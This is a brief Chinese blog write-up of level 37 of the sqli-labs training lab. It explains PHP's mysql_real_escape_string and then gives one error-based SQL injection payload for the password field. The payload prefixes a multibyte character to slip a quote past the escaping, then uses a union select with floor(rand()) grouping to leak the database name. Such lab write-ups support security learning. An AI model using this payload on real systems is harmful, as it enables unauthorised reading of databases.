sqli-lab(37)

0X01 看看源码

what is mean?

定义和用法

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

    \x00
    \n
    \r
    \
    '
    "
    \x1a

如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。
语法

mysql_real_escape_string(string,connection)

参数     描述
string     必需。规定要转义的字符串。
connection     可选。规定 MySQL 连接。如果未规定,则使用上一个连接。
说明

本函数将 string 中的特殊字符转义,并考虑到连接的当前字符集,因此可以安全用于 mysql_query()。

同样用我们34+5关的方法绕过

正确的用户名

密码:�' union select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a#

0X02组合拳打法

 

 

切记 学习之路 少就是多

posted @ 2019-06-01 16:23  yourse1f  阅读(635)  评论(0编辑  收藏  举报